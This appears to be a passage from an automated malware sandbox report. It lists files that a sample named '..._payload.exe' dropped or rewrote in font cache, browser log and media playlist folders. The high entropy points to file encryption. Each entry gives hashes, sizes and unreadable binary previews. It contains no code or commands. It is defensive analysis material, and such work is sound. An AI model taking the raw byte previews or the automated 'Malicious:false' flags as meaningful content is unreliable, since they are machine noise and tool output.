                                                                                                                                                                      Preview:.........5|0..z.M..........;..b..X.1t........wQ.m.8.....)*.......Q....ip....2....x].{r,...~..G4q}..w..c..E....U.o..0......v...u`.hO..5..].-..&.........wVx''..7...ep..)^(.......1.y(...S.o.KX.H. SX..^..$_.>....8.JF..4V..H}F........5Rs-...~.....F....v..>.G...R..oo.._.<7f.2.one9@....O...]..Q.....^....Q.T.f.9..h...P.W.^J...l..^T..nfQ....h.a.?:.*.pa.....y.....mF$2..(.....&.W"..........5.....#..%.).....(<?..QY. ..}CR....ooa.3/.....K......!...g.y..>...4..\Q+R.X..7gi/...V..RL...6.4..#`...|.F......n..\n7t...!.Z.......[.Dv..E#.J.....G.4.@..s2T#.0.qvX......p...H.H..q.%}. B.....;.........z..W..g...-u.u.Mi....^...I=..g..E...<.Q}X_......o(.2g..vs.;..rr...S."..t..y.....\.G5.n...D.6.V.....k.yy+.,....&.....I.........?.J..&..),Lj..A.).>..Kx:.T.t.v......@.h1B........u.j....E>{P.e"$x.<.*.".?.....w..%...D..Y..Kn\{........`...S....]..^.D.<........v..4@.P..Z,...R/....r..!)......z._..DfJM.G.....l.*M&A>...5>......;o...N.++..#. ob.c...c........!F]1r...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\29939506207.ttf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):237946
                                                                                                                                                                      Entropy (8bit):7.233284224741468
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:oXbcUKLS0MNyPftWwwx7MXolfFcDo3QOn/7k/ukIO2Nppdj+cdUAvA1:oYvLS3yntFWjBLlSQOa/dKF2A1
                                                                                                                                                                      MD5:26F68BC64B8308B476B969DC4AAB7F30
                                                                                                                                                                      SHA1:5568DC49859857F5DE5212D2158B0FB7D9C3FB7D
                                                                                                                                                                      SHA-256:8EDBDC47EF0F07514D7425AD1DFD92F219A18A07ED696D996C2DB55C05ADA00D
                                                                                                                                                                      SHA-512:222F5F8E758628D940F557F62AD6B4051447D471D73CCD98EB799302A2D2165ABE068BD2356C0B080E41BB990320B885EA8845546DAA29D14954A3FC37C7A7A2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.....`e:K.......LY.........%..+>i... ...i...x.l...v.$....zw0..K........~nn....p..v......T..]q...PhX0..h...ky.O6..Px...4.e`t`.US.&....h.....k*.C...........eo..?w.?.i.I..t....H...r.BP..$.(.x.j..f..Cb.]h.U.].v...T....xx..m......y....U9w.U;..#...?.B.%.m....._..$.K..[.Z.m..i...Z...#..Z.kJ.B&]I.9x8/.U..c..j....T......Lj.<.......L.%...d.........YwG.C2O@.......\C.R..A..kp..W.Z.u...X?.......I8..*..;..6..M.,..\......|....e.:!..@+?=?R_r.^.MdS.2u..|....5.F.^.4I..$\....D7.&J.*.$...M.=S..+/...k 2.BR0...e...+.....$...E.1...;R..I...._L.ua.n....R8.Qo..LMm'L...#.....A.:.de.*....>..T#!...|.n sG..... .t...NQB.%j.....!Ne`p...e....=^..Y8.+"..t.o....nW.mN..].*......7.f..:...0{`.....7M..........t...7...a4`....w.&...e..Y..h..]...-ym.{a.B.k.....{.....zc.h...,.......T..X\f......7..j..T..(..},{..$.v......j...~..n...C..%.x..!.......ISV)..n..(......rO.."....^e.Q._...X.<iZ.bk....;.L.;.`..9.....T.i.3m,.O.!......p...&.f.......C....\y.4.O.../h..9.dW.Y._$..,p.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\31169036496.ttf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):240470
                                                                                                                                                                      Entropy (8bit):7.265336753316397
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:YaDTRv3rWQUKdBh3ltoEwjDaCjO7CZ370TZdZ1s8auvQrM31EX6hCnecDBblb:lDFv3qQf5kSCjOAItz1spuYrMw1DB5b
                                                                                                                                                                      MD5:316428D50D9F357237BBF4296E582063
                                                                                                                                                                      SHA1:BCFBF9B7CF9B40837913C2D87C2E1F924E52275A
                                                                                                                                                                      SHA-256:208FCAFD7A831853EC5EFE450A416B9E08C4B90AA87F49B48AEBB4514090D716
                                                                                                                                                                      SHA-512:58F46CD44CE648CA777D1529F543F4FCE13D3F04C95B3E95DCEF871C09DBBF4A30F367A103E42A927DFD93724F39E048BC159ED6229B642D9D7DA70DEC8A73DB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.....T,^..}.<.@=.5.6..I.b..v..|..n...'I.....E>..m.2.cR....pC].......4...N3=..$3.E...@..=.6{..&...,9.#..i.x.d..LmD...9."E.....(.._<...L.+..4/....l.....b..U9.?.,].R..B......T.Pl.....r.....O}.aL....E..o.O6v....S..Z ......3.w..iXxs...?C..^..d....h..gW.>..#..v..O...^..*.'X&+.c.fwiR..s+?Va8.n:4.._s..M..!.b..1... G7.q~*.y..y6.w.z.=1..=.U;.,&..|.s.0....T...&.".Bl.`w.&I..hKi.w.q{s....?.^B....*...Q..a6Q}.O.[..................:.............9n.f..Go `..)...'.....:..-..g\/]....+@.. P.&vp...\l..o=j......9jG..,..G..t.....J$K^......a..|..w.^[@..a2W....,..#...N[.....0.e......Vo.........X.".~E@..,Iq.....|r.@..1..m..G."..<yx./.c..v"..<./...............o..o.D..lW....1.y..G.9..1.. b..zh..E....#Zx+.J.3..D.L.....T.j..Q..#.../$...}......uJ...$...}~l.l....t<R.....H....i.x.a5q:.._Y"e.-.W#1+G....o....{..r.C....[8...a.....^%..xL]m.Z.s3.T.&\........ .k<.b"~t.KmO.....`.L.....%..}..........f...h.Ul\,..$d..Y..}.v.e.}.}..$....DI=C5....2X..{....t.we*..#..P..."G..S...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6906
                                                                                                                                                                      Entropy (8bit):7.973159588783052
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:LnxOQJZ5TorFHBZifO12AuJaTy3szwa10hgiPmT:LE8Z5Tq1OFAuJYGdZPmT
                                                                                                                                                                      MD5:742BBD7FE7D4C29CF6B66F6CA12717DA
                                                                                                                                                                      SHA1:26E4EB4A85D5B21F4D9CA5501FBE50A4E1F5F54A
                                                                                                                                                                      SHA-256:5F406DDC43B41F076BF66B9EC540256477126160AF472ED3200FC38FD9B0AEBF
                                                                                                                                                                      SHA-512:A3E2351B69F3620BDCA6BEDFD16B2681E69AC4E5C989809FD95CCF0B9688CB1892B384932AF79894085F780CF115589AE19CDC4FE63D7859749BDFAE0D952A21
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:10/03....Fv..W ....<.1OLv..".....CZM..0...?\.....V.p.z4.....f...2..7$z5...1>....kB (....Z..|z8...C.O....<..E.r....W|.......2.*.=3.r..A2Q.W...........d.'.?....A!4.IMu.kuI..0p9..N.p..K..==....wLj.st.Z1,....Llmn...h..I.]..-29.Jh. ....Xf..2U.)....>.......5.|.....wC4..8....].}A..]j...8.'.dy...F...<.......v...$Cr.g. ..Y..W.....|.}.RfZ.?`...oa.pmr_Q.]...;,@N./>.ZK.\Uj.....p+...I..D.&.h....u..`.......W.N.k..9.w.9.T.VZiW..}....M.|)cJ.Y\...$....[w$. @U.2y$5...3.fw....I. ..a.8...B.yu..n<x.;.R.7.bI..t.~m.#...7..`..e#...}....9....."|.s.l...c+pn)....+.+...N.W.J&.......(...@.nd9..&........;....xK...-.Yq.......=P...}N...<.B...H.....V.....=.L..&3y..-... t._..,E...S.i..y....Hk.R.......FW...t..S..o..).b....w....}*..?3..............h..v...+.....9..<.....W...rcSf].*.....p..z-.%.=.&cs.........1..a?@..@.G.s.X..~D...a.j....>`......-.....In3...4X1....$...`.H.}.*.xM..........7(.3..|.R.-..Pk....|..4....O8.dr.!6&.^..0.OJN+..xA.qg..*.P..nqofO.N..Fp

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):834
                                                                                                                                                                      Entropy (8bit):7.733609740575759
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:QGkXr7btVHM5hkoS9x68lJxeSm5bVo2bD:Kb7btVCCoS9x68lJktVbD
                                                                                                                                                                      MD5:8FECC0F8043910D164B3B396B82E8537
                                                                                                                                                                      SHA1:794712EFFB87DB08F8DBC8E901264D0202D72DED
                                                                                                                                                                      SHA-256:4E599AC134E94916B22725177F4F6E77073DF3795814890E3423272DC2A738E9
                                                                                                                                                                      SHA-512:82C26715A3F2DEC029AFB746D4472E29DC5AF522D25665448C5D270AFE3BC7938077525C9DB7FE413A65781120FA976E3FC78F8471C5EB806566841E3262887F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..1.0......k."=...a(.)......'FA@.....f.....DpHE....<......M........J..P.U..,..yk.$...6...~.7.q]j,...t/.V.Jf.....L=.\.5?x........C)..(V.}.J.A..=A.......S.mOzU...[..QX.=.....Q}...<...9J...V)O.Ibg~..3.\;"?........N..j.fk6.Azni.}.A.......p...j{..l.n.^.X.h....&.VN>.....F/.;....'...Hz6.a.~ ...q..-..V.jq....-..[...O.`-....._.H.0.F....s}...D}.......aM.x.x.k......Y..Z.?..?...={A.d8......*....96...).t..y_..j..O.........Z*<P.-_N.pgy.......%?.2u........S......P6.S/Q>!.e..BR..s..../z!d....Q.,\.W.p6I.eT..%..gS...,..$~.U...@(6.0..|......(......j...#.YL.A...i....\`.Q.%....#..L)..3.'...~..K.Me>..$...iTND..&:\..uZ..R.iT....}.D.EtY....^_..E#.D.K...9..9.....U.3.[BW..._.n..;..SdvB.z'..j$..K...)x...\.=B.K.S.l/|..h.W.d....-.M....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-UserConfig.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (869), with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1740
                                                                                                                                                                      Entropy (8bit):7.89102934892059
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:1HSEqR+oMs+cWUnF8kVW1CEWOeqpC5jiD:1vw+oMsC4St1a+
                                                                                                                                                                      MD5:355094360A7F57A5AA71BCF8BBC1AC3B
                                                                                                                                                                      SHA1:919CC975FC3F12DA572B820F78E4B74FFC4A4C7D
                                                                                                                                                                      SHA-256:13972E7EDAD16D880879AB810F181779C7CB4268CBCC3C2E174668665193B8AC
                                                                                                                                                                      SHA-512:5C7C48731900CE46133B8D1FB9A1612FCECE24133B53092133BDA9AF4039557AE7C6D9194CEB233A753F86C326BB189A87E9E1EDDBBCE934E29EDF350CE4187E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..1.0."_..$..]..`..4.8.Z.....1p98....@....[..J.P...TP.................|..(g@.g.c.27.d..`.Z.;.D.....C..e\..(......_..0PT....8............u .M^...6.u..?A..'.[.D........x..>.r.{o..O.4............:...T.f.9..,u.>...y7*t....<._.)....].U.x............<a.r.u.m.,........R.....e.d.8..p!z.. W..y...-..G..,.qm./:_Z(....KNU.h.a...H.e`...NA.=...r_..Z&y.s....w.F(......nP.9.o}.~...f..`)........]JU....].}.ebN....A{...f..}..z.IS.t....Ha.F.`..:.Q.W.-...:./....s.D.Z....l.-q.^,.X...eVK&t...*'n.p....1..Iz..!..6.....!..b.N...c`....~...A.. ...H1.......D..1SW!|.;..c....\......<........+l.AK.7.;...q..%.iy]......59\#..:-.0....D.aE..EH.XpJZ?9.6.f....."..D6.......yBD.V.H....Z..D.`.qv..jE%].6..;.6-.....E\.........t^v.'..T2.-J....b.M.......I....n........Lxa....Qy.........#.?....,'..3..}...3i..._-,|..9>.pA9........M....Fac.^..\..J..t.P..O)a.......R...!Z..ONU.-.u.....v.U...g.....zm.go...@kQ..m.f$o.rE........=.i..<^.P..U]......]2.cZOg.O_3...V....fY..d.4.....P{..f.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\01_Music_auto_rated_at_5_stars.wpl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1378
                                                                                                                                                                      Entropy (8bit):7.832278910157052
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:mQ9ssDsVL1Qj65Nr6M2yopSZQSSRI2rYrVdRpcjcqELjr4vKK+4c5+ph2bD:XSw6sMv28rVdRSgqELfn7G6D
                                                                                                                                                                      MD5:DF653F5FC1CA578489BA073118527BDE
                                                                                                                                                                      SHA1:B5B05F09C064C9A66F616B29A58EF7995371E708
                                                                                                                                                                      SHA-256:12974776D5FCF8D39613AFB942E8786D3D02B4288A69F6FBB55C0DAF9C244972
                                                                                                                                                                      SHA-512:8FBF5FBC97734A1A60AA8342EAEE08C7D4AD899CAEBFA92FCDE115C5D0962440C2BE327ABA688552F5C1BD45CA581D0B8EF9937543AB1613BF22472D1DBDA798
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?wpl.T.z0.........8..s.o$.D<...o...F.0\.I..P...G.)7..........W.T.....Z........wkS!...0.yWg..-.S....$.-(.w#..PaD.....&..(D...,]\.^...W.j....9P!.{.I#.6...b0I..*.4(..iT...W.pl~.T1...y..K..8F}..# &.M........Kc.y.D.yDG.....TsVa.0...Bi>6.\...,s]^.dT...@.....gM(RQu....H(N...?..H"....%..:.Q.\..g.....g..o.XD..@.%.........8.0.e./)D....`.....'......J...$.. .g....W'...b5..q...^......p~..6B..'........RW+&.......s..^' ....dj..B.yAI.OG....!.u`w#.#.kq.'..~T$T..d.C#F*.....5Fs....B._`Q.[..lI6N.3...[y.5[..Q.69...2.s........o..;...Y6w.TB.mD.UB.3...."....Y..^...N..,O..p.w.P].....t......(.Q..F(....En...h$..6;.Z..........5`2UY...?...Y:<^.w..+..U..!f......`zt..)|.d.-.<..i.....]..~..r...O..%.....UGi......rg.m.p.....u....J........Q...7Yu.. ^x. .&h.t0[.b).~........).^..{}.N.....xn.....pHQk.v.....D..z....j.%Mdg.g5...[..f(..>\..jgU..&.U....6.N.s>.*..Mx..AN..z...F..T.*....i....y7..0fFo.E%..c..h.....l.9!.e.3F.8C.....:."z-r-.|?#D....s..u8...g.p.Jm../...c-S.7qfR..C..3W.'

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\02_Music_added_in_the_last_month.wpl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1613
                                                                                                                                                                      Entropy (8bit):7.884216460632737
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:x1AlrRBcW25agzJtWdjFuEFsveUVjieYrDaFQvtlD:xS+5aAmuEvUVjRb+X
                                                                                                                                                                      MD5:BD1D453216EB9BCCFE6DC08E360E757C
                                                                                                                                                                      SHA1:6665684D3687051850BDB640BBEE750B36F7D3FF
                                                                                                                                                                      SHA-256:4B3396360C73524E6E0827E6A0224319A17704D731D3EAF95323922E742E075F
                                                                                                                                                                      SHA-512:F8287DEE2ACF2AB3C23D8294A01811E9CA2B806923809D11943C5AD24148BF39F87EAC479E66BA84402910828CFC07CD1C90E9E0B54542BDBED9CCA59199E685
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?wpl.. 4.n....p..L.v.a......UD.T9.............y..bA..\rC.))3..sF.?..#.N....m_.&...A\}.._.*N..2.........:...... ..'..p....A..i....x..]d.|B....^.......)..]m`Oy.QJ.-.1....?...).#H..Z.v.%..J......Q....K.....&EP...X..'...Q&...g>.B.....!7%.w.$..g....q....8xv%m...rv7.os......~.3./...v:.....@A.....xOc.1...{..x..T........9...."'..n.aQ.....@)...e]S..0.H.\d.p...:-y.SO..F..wu...2..c.0..T84..O.a.._.F1)..;.C.....&=.....d....n.W.....&.Sg3.Y......A...........t.r.~W.>.3.......G,.aO.<8@.+mX1.m..is.._.....wG........y~:Z<......M3.Ct.x...y.qR.K..l......g.:u.........3ix;..N.........6.2c8z.;...8...`"{8V.W.N.1.=..s.,..7F...c....zl......./....wL....W..c.T....O...^...P..B..a...;F.F.3.P.;.....9...2.....N.....?X........6d..&.g.H.:.s.......A.s......:.......`H...)y....rc@..{Qe.....O..........4<`s.3./...EaW}MyF.y.....}.98..J.q...3._)'.....p.w....K.#..\T..c...`......J.n8.B......8~.|VF>c.y..0..e........G.!.....G6.Nz.........y.+ZC..ue.....&..P~.r,.h.. .%1..R...o

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\03_Music_rated_at_4_or_5_stars.wpl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1601
                                                                                                                                                                      Entropy (8bit):7.881530076094219
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TvpSvdJAKobxo4BUI7L22jSaiTvHj+guUbq/o18MgX3SGnILe16bqV2bD:Theuxf3V+dTDsUm/PMDQcquD
                                                                                                                                                                      MD5:A46791C9EA273D0786EBCC10BF8234DE
                                                                                                                                                                      SHA1:6C4501E73CD36DFA881A23756F6EFD6C61998514
                                                                                                                                                                      SHA-256:83205D90E4C59E92AB45F4086DB949E3241C5FE0492C2502FBCBF902E4E0ED35
                                                                                                                                                                      SHA-512:4A86A5CFFB67A20363DC9485BC2D704B648DA2AC2A87452535B4F31BE765543ABC5C89FF9D9579D2D4DE8DC80909C40B7811B1CF2445DD64D8B48BCF36D37319
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?wpl_.s.Hu...u4..O.#.%.8...My6...5.*.A.N.....w..TgG..._D.\...M,.5..K[f.].5N..50.B...l.-o.:.n.s....O..`....IM3G.%..3..q.........1y.u.....p..g..ZN.......^tv|+}\\SF......P.`......d............^...K.._W.2....[..u.2N..>......6....@A..[.J..!..)n)..1.(..k...e.B.r.b~.~.|.)..\[2..h.Z..)......Z.9.'9.O..m........7.1=.e.`=..j.N.zA.=..,....._..5.ZK..%...Q............9Ca.vB.K_<T.......2.`0o!e..S^=...`...,2Ckq.I.@O.<. X...!..t.0.A..l..b.%U...g..A..\.j&...=.n)..r.#....E....R#.....RUC..E..(.&..s.....#.-*...y.T)#^.C.6..6L[.......U._.U.p......H..t...Y.....s......o......8...=.....Q..h.0.FY.<.lh.|..M......d......I.....)e....e......C.+5._F..?;.NE..d&.A4G.....e.)@...F.Ev*5.....k..4.o.6R8..)0\.i.t.8]._.%^..^H.\?.W/..5o...G<:v?....X.[...L.D..zi?...&.9Le.xg.}.........{. e..K_J.....p.NQ.!A.9......Y..sw..X0.|p.5...[...Zz*..8h.....".......y.L..;.|...f).di....yl0:.w."...mq.S..-`*...c.}.#..H..B~&...g.....3.SG..1.T.uy>.....+=...l.t.(.9j+Ow......G\S!h.....,.F..t9.`Z.v....IK.@.A....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\04_Music_played_in_the_last_month.wpl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1618
                                                                                                                                                                      Entropy (8bit):7.886264112052473
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:90zcsBrCkMmZy873tfXzca2qemK4WbFPFD:9PsBrCPmUkiqez4CP9
                                                                                                                                                                      MD5:7FDBAD845EF62C9866FA641CD289000A
                                                                                                                                                                      SHA1:DD8A7C3C11F16544F415815F9AA885412FCDC98A
                                                                                                                                                                      SHA-256:DE8C7CCB9151A4D9B29F37172A1EEFEBBDF0BC105A37F496B11BC98D7BDD3F68
                                                                                                                                                                      SHA-512:4520C7AEAB0710A60E5BD538BF47B0D869FD321215967B9519448E3EDD4D3FB9F8CFD928B22082ADFAAB541E9439C3CC9A482C2810B192EDB8E770286E4E5DCB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?wpl.Pn....k...*!.~..3x....S..Wz"..w|3....r*...%.'..>..}...M...zf.|.7.|sDP..../..E/../. .V.......:..r.S..vC...$...n.nSU.C..0...2...........Md.......O...q.Ez.o.y....jb.N.d..S..1.Dwp.....~....&..\....hM..H!.K=L;.yg..[..Iig$4..W.Q.&.K...x.%.e.u."..sJS....$K..... ...DE}....n......\q...N..:cP......'.k....+.....F...6.n...-./g.m..JYjrN....]wy..5^....I..R.....T....U.^u.....i..W..i.T..z.d....e..e..!EC..;.z7...$...R*.....y..e|...'.hh{...@..U.BO.,.<..A.XeB...l.c........H../.._...Wx...kt.?.1K!...+.SH7H..p.....Rk.......P#..B.......L.7....U.88.BO.......W..Y....a..#.)e.....b.)8Z..D.,.&..`......1......j..>....9W]..3sF..;.$...7.)I...<..M:M..r../.H......X..xYw.4....#.6Bu..z!Z6f....8.....k......W.^s#7...........Og.A...vS"....T...m.c...osA......%..2..V.....9.E....u&..A...o.}u..l..c..I.~6A.oGK...:b..Qw-.#7..+..:.u.\*..7..)M..H;&...:...........:.z.?'.I2.....h.^[.s............`.~.....g.3..z.=..I..He._..U.8.w....!n.x.\+..b@...j)..j.js*..]^.P..+0

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\05_Pictures_taken_in_the_last_month.wpl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1131
                                                                                                                                                                      Entropy (8bit):7.790705375081345
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:vSuH4LtOR9kvZGJm8MnLDgJ1fVosOthqUzb9F12bD:vSuYLtOR9C4JmznWD+jHOD
                                                                                                                                                                      MD5:BA1BA9F947C7466B5A2A6C44C8E6767C
                                                                                                                                                                      SHA1:355C1E83718127FB6F9A1F65D05E36E69CF47C30
                                                                                                                                                                      SHA-256:B6D176C56AE4EE696AEB0A4C436CE798A71B0F2CFBCBD840DE5DC359463C1D02
                                                                                                                                                                      SHA-512:D31493CDDB1C120C88629B6134E7224D20E915E8A88CBC0116CDCB39556ECEEE2994AA51DDE037A78C74FF96DF468BBFAD2219C14BEFB7EE10EDA556EB6C3462
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?wpl./QrV.b6...:v......7.nHv....b...;.O.[~..:.Z...a.0..C......~......R....m4.B<....l..Q...a.;.0..pa...Hz.Z...?+'..%..0.C|.@...K.}HM.."L);.[.YU:yH:.'...f .c.&...jN..%h.-c.6.....O'......_.L...B...$.%.....y......y$.m.,D{..o.../]..a.X..W.+...x...A{......+B*Qnf....".....\...lg!.4.:L...|.w.....,t3..z.........dY..ZQ.=.....*.........4.4.|.u.}....9.Q7.Y.J..<_]..;..V...E.9Mj.B...X"......9<...1s.R(...u.@.q.....-w...F...l........"...iV......p..e'.^.6..c.{.v_.`..4........b.m.....K...bj....B.\C...B.m.....&*....e...D&..1_.".0a..M......2`.....Q...<..."0M.NO.l.....J....b...F.9.....[.DU.4...v"../..B2......+.l....o4.q'7...O...A..Z....g.1S,..D...u+..I...._-..Oj..p>O.....9...v...."1.<}._..IS..}Z<J..x.t.<....O..y.m.J0..&,T...8.GX..!..B.......D'2.(f..n9..._...KL.g...P+|....[|.x.......`3.n...4.ugoh...!^..B......\f..Z......|...K..N.\.r....S....D...S.8R.v.=f.....i.[.ut?L{.H..HDy=.3..1....H3....$....V..y1.m..lN..%K.....]x&}yL.q7.'..."]Ul...g=.R..,#_`....E....ll.....O..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\06_Pictures_rated_4_or_5_stars.wpl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1119
                                                                                                                                                                      Entropy (8bit):7.823530333276605
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:PRqmV6B+LpklNw9N8f/GWfiwo/hnRI31+uIin3oE39xRa1TbO2bD:UjBekMr4Bfip/xRI3yin3oE3sThD
                                                                                                                                                                      MD5:65C0902BBDF1A524FA9163A35A79FAC6
                                                                                                                                                                      SHA1:0C9A8F593A074B9A2315E41F442D1544E5F76DE2
                                                                                                                                                                      SHA-256:E9C2C63DF913018290B2BAB1A9E7AFEBD02A942EBC1952DF3863D10A02AF3CC8
                                                                                                                                                                      SHA-512:DD6DE898627E152B7A74D443DEABD1CAD766C6FC6CCD0506C0DED8DAE8BC157D6BD81C022B8770F0636400694E33A392C2D1D37FF436CE0618E7359B3EDE407D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?wpl...2PA...8..4...w....b.9d..1.N;dj.,...28Tmd..q..h.V..]....z..V..M......:.. ..4..e...R0..XR..l.3.)j..a1.I,wq!.K...@A.x.L.1,nG.....5;\..K.C..U.>......P..%.R.2.H.......d<....K.?..Mx].Jz..I......]O............y.b..PR..D.......s.....X._w.].k..J...v...........,z.....6cBo>...{.X...3.}.H..\...{....U8....=X.64>..y@....s&R`.f6..0.9...'..0.....E.s...GXvY......'.sY.T.M.....o..cU.....f...!.-....`.{...w...V.E[.......r.J..?.Kt...8....O.^.t..../.6...w3.Fhk,h.H..T.fj.sI.J...^...d...)'.C&Sg8`up. L......q`FmH.../. ..-.. cr9.2....Yv.7gQ9......A.,.a@"\.b.=8W...P6;|.07.......s...mC.J.q...`eKE..J.6wX..cJ..(....\.`.(........I2..w.5......:..."....5....k.....(+%.Z.Q8..$..%.`\..~.u....$[..6.v.20m.....1,.tK.E.........4...{.{...:...,.......h._...N.Z.f.%.....~I..@2itw.G&j.,8m."uB..^.u....s.\T..Ge.....-R.9...f!.......3]...vp......i..Y.&..`.NUN......B..ZN.$T.9......R..d..M..#Z;.....*&/..D|..d.'.....o.S..BWl.7...#Z"...Lb}.h^$..o.....FV..+`..,..c{...a

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\07_TV_recorded_in_the_last_week.wpl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1374
                                                                                                                                                                      Entropy (8bit):7.855750629552582
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YgwWAtKPrc1XrMYep3Pyhha/ReF01Xlc/AU/SxyQ2WkDITICM+52bD:YgwJSeXrpU3Py2su1Xl2lRQ2BITIUSD
                                                                                                                                                                      MD5:F9592CB5D97BE53BBA6B749C6CE5390C
                                                                                                                                                                      SHA1:4988C2200D428004188C27C309C7AFE9E5AC4070
                                                                                                                                                                      SHA-256:F2648A979EC3877D7E8A6A6EFBE0336533031FEE50BB35A893ACDEEDE7BF9E80
                                                                                                                                                                      SHA-512:BE2E544CCB5A5EB3A02E745136B5722A799977154A42A1E8E6C0BF4D1DD6791808403AA933AFBCAB48634ABD119F8FD4F4B034B3799828EE3714EB5ACC37E830
                                                                                                                                                                      Malicious:false
